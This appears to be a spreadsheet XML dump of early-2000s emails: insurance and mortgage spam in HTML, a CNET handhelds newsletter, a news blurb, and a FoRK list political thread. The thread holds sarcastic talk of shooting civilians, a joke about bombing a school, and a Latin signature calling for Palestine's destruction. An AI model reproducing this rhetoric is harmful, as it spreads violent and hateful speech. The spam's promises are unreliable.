 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Electronic =
 Enrollment&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Simplified Issue up to =
 $100,000&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
               &lt;tr&gt;=20
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Unlimited billing =
 options&lt;/font&gt;&lt;/td&gt;
                 &lt;td width=3D"50%"&gt;&lt;font size=3D"2" face=3D"Verdana, =
 Arial, Helvetica, sans-serif"&gt;&amp;#149;&amp;nbsp;Commission advance =
 available&lt;/font&gt;&lt;/td&gt;
               &lt;/tr&gt;
             &lt;/table&gt;&amp;nbsp;&lt;/font&gt;
 	        &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/20020514-7.gif" width=3D"535" =
 height=3D"57" alt=3D"Don't forget to ask about our matching retirement =
 plan!"&gt;&lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;
             &lt;font face=3D"Arial, Helvetica, sans-serif" size=3D"2"&gt;&lt;b&gt;To =
 learn more, please call us today!&lt;br&gt;
             &lt;img src=3D"http://iiq.us/images/ntl/20020514-3big.gif" =
 width=3D"530" height=3D"64" alt=3D"800-626-7980"&gt;&lt;br&gt;
             &amp;#151; or &amp;#151;&lt;/b&gt;&lt;/font&gt;
 	        &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt;&lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;&lt;b&gt;=20
             &lt;table width=3D"95%" bgcolor=3D"#000000"&gt;
               &lt;tr&gt;=20
                 &lt;form method=3D"post" =
 action=3D"http://65.217.159.103/response/response.asp"&gt;
                   &lt;td&gt;=20
                     &lt;table width=3D"100%" border=3D"0" cellspacing=3D"0" =
 cellpadding=3D"2" align=3D"center" bgcolor=3D"#CCCCCC"&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"6" align=3D"center"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Please fill out the form below for more =
 information&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Name:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt;=20
                           &lt;input type=3D"text" name=3D"contactname" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Address:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt;=20
                           &lt;input type=3D"text" name=3D"address" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;City:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"29%"&gt;=20
                           &lt;input type=3D"text" name=3D"city" =
 size=3D"20"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"14%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;State:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"9%"&gt;=20
                           &lt;input type=3D"text" name=3D"state" =
 size=3D"2"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"12%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Zip:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td width=3D"23%"&gt;=20
                           &lt;input type=3D"text" name=3D"zip" size=3D"5"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;E-mail:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt;=20
                           &lt;input type=3D"text" name=3D"email" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%" align=3D"right"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Phone:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"5"&gt;=20
                           &lt;input type=3D"text" name=3D"phone" =
 size=3D"50"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td align=3D"right" width=3D"13%"&gt;&lt;b&gt;&lt;font =
 size=3D"2"&gt;Area of Interest:&lt;/font&gt;&lt;/b&gt;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt;=20
                           &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Worksite"&gt;
                           Worksite&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;&amp;nbsp;=20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Individual"&gt;
                           Individual Sales &lt;/b&gt;&lt;/font&gt;=20
                         &lt;/td&gt;
                         &lt;td colspan=3D"2"&gt;=20
                           &lt;b&gt;&lt;font size=3D"2"&gt;=20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Both"&gt;
                           Both &lt;/font&gt;&lt;/b&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td colspan=3D"3"&gt; &lt;font size=3D"2"&gt;&lt;b&gt;=20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Agent"&gt;
                           Personal Producer&amp;nbsp; &amp;nbsp;&amp;nbsp;=20
                           &lt;input type=3D"checkbox" name=3D"Category" =
 value=3D"Manager"&gt;
                           Manager &lt;/b&gt;&lt;/font&gt;=20
                         &lt;/td&gt;
                         &lt;td colspan=3D"2"&gt;=20
                           &lt;b&gt;&lt;font size=3D"2"&gt;=20
                           &lt;input type=3D"text" name=3D"NumOfAgents" =
 size=3D"2"&gt;
                           Number of Agents &lt;/font&gt;&lt;/b&gt;=20
                         &lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td colspan=3D"5"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td rowspan=3D"2" align=3D"center" =
 valign=3D"middle" width=3D"23%"&gt;&lt;img src=3D"http://iiq.us/images/q.gif" =
 width=3D"43" height=3D"50"&gt;&lt;/td&gt;
                       &lt;/tr&gt;
                       &lt;tr&gt;=20
                         &lt;td width=3D"13%"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td width=3D"29%"&gt;=20
                           &lt;input type=3D"submit" name=3D"btnsubmit" =
 value=3D"Submit"&gt;
                         &lt;/td&gt;
                         &lt;td width=3D"14%" align=3D"right"&gt;&amp;nbsp;&lt;/td&gt;
                         &lt;td colspan=3D"2"&gt;=20
                           &lt;input type=3D"hidden" =
 name=3D"hdnRecipientTxt" value=3D"marketing@ntlmail.com"&gt;
                           &lt;input type=3D"hidden" name=3D"hdnSubjectTxt" =
 value=3D"NTL Ad Inquiry"&gt;
                         &lt;/td&gt;
                       &lt;/tr&gt;
                     &lt;/table&gt;
                   &lt;/td&gt;
                 &lt;input type=3D'hidden' name=3D'SentTo' value=3D'304704'&gt;
 &lt;/form&gt;
               &lt;/tr&gt;
             &lt;/table&gt;
             &lt;/b&gt;&lt;/font&gt;
 	        &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr&gt;=20
           &lt;td align=3D"center"&gt; &lt;font face=3D"Arial, Helvetica, =
 sans-serif" size=3D"2"&gt;&lt;/font&gt;&lt;img =
 src=3D"http://iiq.us/images/ntl/20020514-4.gif" width=3D"128" =
 height=3D"109" alt=3D"National Traveler's Life Co."&gt;&lt;/td&gt;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&lt;/body&gt;
 &lt;/html&gt;
 ------=_NextPart_000_14C159_01C237E6.C5B22F30--
</t>
  </si>
  <si>
    <t xml:space="preserve">I propose they rename it "Charlie Heston High" and maybe the students  
 will learn to take AR-15s with extended military-spec scopes and .223  
 high-velocity ammo and start plinking innocent civilians at random in  
 the suburbs of Washington.  That's far more effectual than blowing  
 oneself up in a bus.
 In America these days, it seems that violence ascribed to any political  
 doctrine foreign to Bushism is vile and repugnant.  But random violence  
 is entertainment and intrigue.
 A couple of ex-FBI "consultants" speaking on the shootings in DC were  
 quoted as saying the shooters, presumed to be a pair, were getting a  
 "heroin-like high" from each successful kill and that they "for  
 whatever reason decided to level the playing field, thumbing their nose  
 at law enforcement and society."
 See?  Just a couple of kids having fun with Daddy's semi-automatic  
 hunting rifle.  Harmless!
 -Ian.	
 On Saturday, October 5, 2002, at 11:01 PM, John Hall wrote:
 &gt;
 &gt; It wasn't gloating, it was one for the horror file.
 &gt;
 &gt; And of course for the Palestinians it wasn't a mistake, which is a key
 &gt; part of the horror.
 &gt;
 &gt; I'm not against American taxpayers remodeling a school honoring a  
 &gt; killer
 &gt; if we do it with a daisy cutter.
 &gt;
 &gt;
 &gt;
 &gt;&gt; -----Original Message-----
 &gt;&gt; From: Geege Schuman [mailto:geege@barrera.org]
 &gt;&gt; Sent: Saturday, October 05, 2002 9:35 PM
 &gt;&gt; To: johnhall@evergo.net; FoRK
 &gt;&gt; Subject: RE: Our friends the Palestinians, Our servants in government.
 &gt;&gt;
 &gt;&gt; she read the links. what must it be like, she wondered, to devote ones
 &gt;&gt; life
 &gt;&gt; to pointing out  neighbors' mistakes, mishaps, inconsistencies and
 &gt;&gt; frailties?
 &gt;&gt;
 &gt;&gt; gloating is definitely underrated in the good book - eh, john?
 &gt;&gt;
 &gt;&gt; bring it on,
 &gt;&gt; gg
 &gt;&gt;
 &gt;&gt; -----Original Message-----
 &gt;&gt; From: fork-admin@xent.com [mailto:fork-admin@xent.com]On Behalf Of
 &gt; John
 &gt;&gt; Hall
 &gt;&gt; Sent: Saturday, October 05, 2002 11:56 PM
 &gt;&gt; To: FoRK
 &gt;&gt; Subject: Our friends the Palestinians, Our servants in government.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt; Hijacker High (8/30)
 &gt;&gt; Dalal Mughrabi was a Palestinian woman who participated in a 1978 bus
 &gt;&gt; hijacking in which 36 Israelis and an American nature photographer,
 &gt; Gail
 &gt;&gt; Ruban, were killed. Mughrabi has a Palestinian high school named after
 &gt;&gt; her, and it's apparently starting to show signs of wear. Fortunately,
 &gt;&gt; the United States Agency for International Development has stepped in
 &gt;&gt; with money to help renovate it.
 &gt;&gt;
 &gt;&gt; http://reason.com/brickbats/bb-april.shtml
 &gt;&gt;
 &gt;&gt; Links to:
 &gt;&gt;
 &gt;&gt;
 &gt; http://www.cnsnews.com/ 
 &gt; ViewForeignBureaus.asp?Page=\ForeignBureaus\archi
 &gt;&gt; ve\200208\FOR20020807e.html
 &gt;&gt;
 &gt;&gt; Praeterea censeo Palestininem esse delendam.
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;&gt;
 &gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Re: Instant Quote
</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;HTML&gt;
 &lt;HEAD&gt;
 &lt;TITLE&gt;&lt;/TITLE&gt;
 &lt;/HEAD&gt;
 &lt;BODY&gt;
 &lt;table width=3D520 cellspacing=3D0 cellpadding=3D14 border=3D4 bordercolor=
 =3D0000A0&gt;
 &lt;tr&gt;&lt;td bgcolor=3D0000A0&gt;
 &lt;font face=3DTahoma,Arial,Helvetica size=3D5 color=3DFFFFFF&gt;&lt;b&gt;Now you can=
  have HUNDREDS of lenders compete for your loan!&lt;/b&gt;
 &lt;br&gt;
 &lt;/font&gt;
 &lt;font face=3DTahoma,Arial,Helvetica size=3D2 color=3DFFFFFF&gt;&lt;BR&gt;&lt;b&gt;
 &lt;li&gt;Refinancing
 &lt;li&gt;New Home Loans
 &lt;li&gt;Debt Consolidation
 &lt;li&gt;Debt Consultation
 &lt;li&gt;Auto Loans
 &lt;li&gt;Credit Cards
 &lt;li&gt;Student Loans
 &lt;li&gt;Second Mortgage
 &lt;li&gt;Home Equity
 &lt;/b&gt;&lt;/font&gt;
 &lt;/td&gt;
 &lt;td width=3D300&gt;
 &lt;font face=3DArial,Helvetica size=3D3 color=3D000050&gt;&lt;b&gt;Dear Homeowner,&lt;/b=
 &gt;
 &lt;p align=3D"justify"&gt;&lt;font face=3D"times new roman, times" size=3D3 color=3D=
 000050&gt;Interest Rates are at their lowest point in 40 years!
 We help you find the best rate for your situation by matching your needs w=
 ith hundreds of lenders! &lt;u&gt;&lt;B&gt;Home Improvement, Refinance, Second Mortgag=
 e, Home Equity Loans, and More!&lt;/b&gt;&lt;/u&gt; Even with less than perfect credit=
 !&lt;br&gt;&lt;br&gt;This service is &lt;B&gt;100% FREE&lt;/b&gt; to home owners and new home buye=
 rs without any obligation.
 &lt;BR&gt;&lt;br&gt;Just fill out a quick, simple form and jump-start your future plan=
 s today!&lt;/font&gt;&lt;br&gt;&lt;br&gt;
 &lt;A href=3Dhttp://61.129.68.19/user0201/index.asp?Afft=3DQM12&gt;&lt;font face=3D=
 verdana,arial,helvetica size=3D5 color=3D00B000&gt;&lt;B&gt;Click Here To Begin&lt;/b&gt;=
 &lt;/FONT&gt;&lt;/A&gt;
 &lt;/font&gt;&lt;/p&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;br&gt;
 &lt;table width=3D516&gt;
 	&lt;tr&gt;&lt;td&gt;&lt;font face=3D"arial,helvetica" size=3D1&gt;Please know that we do no=
 t want to send you information regarding our special offers if you do not =
 wish to receive it.  If you would no longer like us to contact you or feel=
  that you have received this email in error, please &lt;a href=3D"http://61.1=
 29.68.19/light/watch.asp"&gt;click here to unsubscribe&lt;/a&gt;.&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;/BODY&gt;
 &lt;/HTML&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Black entrepreneurs 'face bank bias'
</t>
  </si>
  <si>
    <t xml:space="preserve">URL: http://www.newsisfree.com/click/-4,8276087,215/
 Date: 2002-09-26T13:42:57+01:00
 *Business:* Black entrepreneurs face more problems in raising money for 
 start-ups than white or Asian counterparts, new report says.
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Xscale disappoints in Toshiba's e740
</t>
  </si>
  <si>
    <t xml:space="preserve">
 &lt;html&gt;
 &lt;head&gt;
 &lt;title&gt;CNET Handhelds Newsletter&lt;/title&gt;
 &lt;/head&gt;
 &lt;body bgcolor="#eeeeee"&gt;
 &lt;div align="center"&gt;
 &lt;a href="top"&gt;&lt;/a&gt;
 &lt;!-- header --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612 bgcolor="#ffffff"&gt;
 &lt;tr valign=top&gt;
       &lt;td width=442 colspan=4&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/hh_hdr.gif" width=442 height=60 alt="Handhelds Newsletter"&gt;&lt;br&gt;
 &lt;table width=442 cellpadding=0 cellspacing=0 border=0 bgcolor="#ffcc00"&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000" colspan=3&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000" width=1 rowspan=2&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=10&gt;&lt;/td&gt;
 &lt;td width=10 rowspan=2&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=10&gt;&lt;/td&gt;
 &lt;td width=430&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=10&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 &lt;!-- skyscraper column --&gt;
 &lt;td width=160 rowspan=2&gt;&lt;img src="http://www.cnet.com/i/nl/dd_b.gif" width=160 height=18&gt;&lt;br&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=160&gt;
 &lt;tr&gt;&lt;td align=center bgcolor="#eeeeee"&gt;&lt;img src="http://www.cnet.com/Ads/Media/Images/ad10-dk.gif" width=120 height=10 alt="advertisement"&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;iframe src="http://www.zdnet.com/include/ads/ifc/RGROUP=2560" scrolling="no" frameborder="0" hspace="0" vspace="0" height="600" width="160" marginheight="0" marginwidth="0"&gt;
 &lt;script language="JavaScript" src="http://www.zdnet.com/include/ads/js/RGROUP=2560"&gt;
 &lt;/script&gt;
 &lt;/iframe&gt;&lt;br&gt;
 &lt;!-- search form --&gt;
 &lt;table cellspacing=0 cellpadding=0 width=150 border=0&gt;&lt;form method=get action="http://www.search.com/redirect"&gt;
 &lt;tr valign=top&gt;&lt;td&gt;&lt;font size="-1" face="arial,helvetica,sans-serif"&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/se/dispatch_hd.gif" width=150 height=20 alt="CNET Search.com" border=0&gt;&lt;br&gt;
 &lt;img src="http://cnet.comhttp://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;br&gt;&lt;input type=text name=q size=17 value=""&gt;&lt;br&gt;
 &lt;select name=target class=frmel&gt;
  &lt;option value="http://download.cnet.com/downloads/0,10150,0-10000-103-0-1-7,00.html?tag=srch&amp;qt=%%q%%&amp;cn=&amp;ca=10000"&gt;Downloads
  &lt;option value="http://cnet.search.com/search?tag=ex.downloadmac.dispatch.srch.cnet"&gt;All CNET
  &lt;option value="http://www.search.com/search?tag=ex.downloadmac.dispatch.srch.web"&gt;The Web
 &lt;/select&gt;&amp;nbsp;&lt;input type=submit value="Go!"&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/form&gt;&lt;/table&gt;&lt;p&gt;
 &lt;!-- /search form --&gt;
         &lt;!-- right column content --&gt; &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/dl/rhc_sh10.gif" width=150 height=20 alt="Shopper Top 10"&gt;&lt;br&gt;
 &lt;table width=150 cellpadding=2 cellspacing=0 border=0&gt;
 		&lt;tr&gt;&lt;td width=150&gt;
         		&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Top-selling handhelds:&lt;/b&gt;&lt;/font&gt;&lt;br&gt;
 				&lt;font face="arial, helvetica" size="-1"&gt;
 					&lt;ol&gt;&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=fd-BXDMQgOrlPcdkeXO_Iti64Q9t8uR" &gt;Toshiba Pocket PC e310&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=12-jaAKIl-XiP4Q-DR-pEvKY-qkCKsR" &gt;Palm m515&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=27-z9ZmIqI2asldIZrSkMRUVolYrBZR" &gt;Handspring Treo 90&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=3c-tK4RIcIslKaPXozY0VXXjhrHNHdR" &gt;Compaq iPaq H3835&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=51-QgUWIjJPu7f3hbjJlh9GpMUHM3rR" &gt;Palm Vx&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=67-PnDkIOEDC4WwO-lWhKPAKa1CPIPR" &gt;Handspring Treo 270&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=7c-7NCZIZWc-HKfZUkfLHDx1984BOnR" &gt;Sony CLIE PEG-NR70V&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=91-EZnpQAzyXW5WSV4Mzb-Byo4hJdcR" &gt;Sony CLIE PEG-T615C&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=a6-9zw4QCUBE5Xr7MUOvAKcnvjbgwRR" &gt;Palm m130&lt;/a&gt;
 						&lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=bb-yT94QYZBRtJqAuWRaT-Dc13yE_FR" &gt;Toshiba Pocket PC e740&lt;/a&gt;
 					&lt;/ol&gt;&lt;/font&gt;
        			&lt;font face="Arial, Helvetica, sans-serif" size="-2"&gt;Find the latest prices for these and other handhelds on
 				&lt;a href="http://clickthru.online.com/Click?q=d0-vjDhQWWFrE1SK1o7c7YuNDxuyC9R" &gt;&lt;b&gt;CNET Shopper.com&lt;/b&gt;&lt;/a&gt;.
 			&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=150 cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;&lt;div align=center&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/rhc_addspot.gif" width=150 height=20 alt="Add-on Spotlight" vspace="4"&gt;&lt;br&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/div&gt;
 &lt;tr&gt;&lt;td&gt;&lt;div align=center style="padding-bottom: 3px;&gt;&lt;a href="http://clickthru.online.com/Click?q=e5-9Z7OQgyw_wD3wCKjnbcumX6cvbuR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/co/ps/120/7029816_120_1.gif" width=120 height=90 border=0&gt;&lt;/a&gt;&lt;br&gt;&lt;div align=left&gt;&lt;font face="arial, helvetica" size="-1"&gt;&lt;a href="http://clickthru.online.com/Click?q=fa-FmqNQhO2YqCPBqntvDA4oSMpoLsR" &gt;&lt;b&gt;Handspring Eyemodule2&lt;/a&gt;&lt;/b&gt;&lt;br&gt;
 &lt;font size="-2"&gt;Though it's a little expensive, the Eyemodule2 is a well-designed camera attachment that offers acceptable image quality&lt;/div&gt;&lt;div align="left"&gt;
 &lt;FONT face="arial, helvetica" size=-1&gt;&lt;a href="http://clickthru.online.com/Click?q=0f-RM2lIqjktLc0VvRsUb9HGRJ1bfZR" &gt;Check latest prices&lt;/a&gt;&lt;/font&gt;&lt;/div&gt;
 &lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;table width=150 cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/rhc_hhnews.gif" width=150 height=20 alt="Latest Handhelds News"&gt;&lt;br&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=24-8DdMIcz6qAzb7q0geUef92iqrwdR" &gt;Start-up nears launch for Hiptop handheld&lt;br&gt;
                 &lt;/a&gt;&lt;/b&gt;&lt;br&gt;
                 &lt;a href="http://clickthru.online.com/Click?q=39-7QgMIjI6yATlAXMCGLs-y39w-_cR" &gt;&lt;font face="Arial, Helvetica, sans-serif" size="2"&gt;&lt;b&gt;Start-up shrinks PC to palm size&lt;/font&gt;
             &lt;/td&gt;
           &lt;/tr&gt;
 &lt;/table&gt;
 &lt;p&gt;
           &lt;!-- featured reviews --&gt;
           &lt;img src="http://a.r.tv.com/cnet.1d/i/nl/hh/rhc_handcov.gif" width=150 height=20 alt="More Handhelds Coverage"&gt;&lt;br&gt;
 &lt;table width=150 cellpadding=2 cellspacing=0 border=0&gt;
 &lt;tr valign=top&gt;
             &lt;td&gt;
  &lt;font face="arial, helvetica" size="-1"&gt;&lt;b&gt;
 &lt;a href="http://clickthru.online.com/Click?q=4f-Iar4IIU8lghO4j-8g-rrsLKFK0PR" &gt;Most popular Palm downloads&lt;/a&gt;&lt;br&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;&lt;a href="http://clickthru.online.com/Click?q=64-UBOhIuLfXctnIfZNGWF8w6YrPhnR" &gt;Most popular Pocket PC downloads&lt;/a&gt;&lt;br&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=79-rsQHIEBfv8BQNnXmFz_e0CvgparR" &gt;Top 5 handhelds&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=8e-Ve-cQCn70h0jI4UPDuYWD0V_WyRR" &gt;Editors' Choice handhelds&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=a3-qXf6QYU1CJ5mSe7fQffN5r5ls4FR" &gt;News&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=b8-smr2QQUwc6-3H5Ilq9S_p8qkEi9R" &gt;Product reviews&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=cd-VHhSQzsKTU51tyIFjAi_TOlRfXuR" &gt;Wireless handhelds&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=e2-J1OpQhyzid1iKbHENBEZdihv9KsR" &gt;Software&lt;/a&gt;&lt;br&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=5&gt;&lt;br&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f8-57BSQfsXJUy6TWHpiaRL6DCwol9R" &gt;Downloads&lt;/a&gt;&lt;br&gt;
 &lt;/b&gt;
 &lt;p&gt;
               &lt;/td&gt;
           &lt;/tr&gt;
 &lt;/table&gt;
 &lt;/td&gt;&lt;td width=9 rowspan=2&gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/dd_c.gif" width=9 height=60&gt;&lt;br&gt;
 &lt;table width=9 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=9 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#ffccoo"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=10&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000" rowspan=2&gt;&lt;table width=1 cellpadding=0 cellspacing=0 border=0&gt;
 &lt;tr&gt;&lt;td bgcolor="#eeeeee"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=60&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr valign=top&gt;&lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=10 height=1&gt;&lt;/td&gt;
 &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1&gt;&lt;/td&gt;
 &lt;td width=430 bgcolor="#ffffff"&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=430 bgcolor="#ffffef"&gt;
 &lt;tr valign=top&gt;
         &lt;td rowspan=2 width=10&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=10 height=1&gt;&lt;/td&gt;
         &lt;td colspan=2&gt;&lt;font face="arial, helvetica" size="-2"&gt;&lt;br&gt;July 9, 2002&lt;/font&gt;&lt;br&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=8&gt;&lt;br&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr valign=top&gt;
 &lt;td&gt; &lt;!-- intro --&gt; &lt;font face="arial, helvetica" size="-1"&gt;
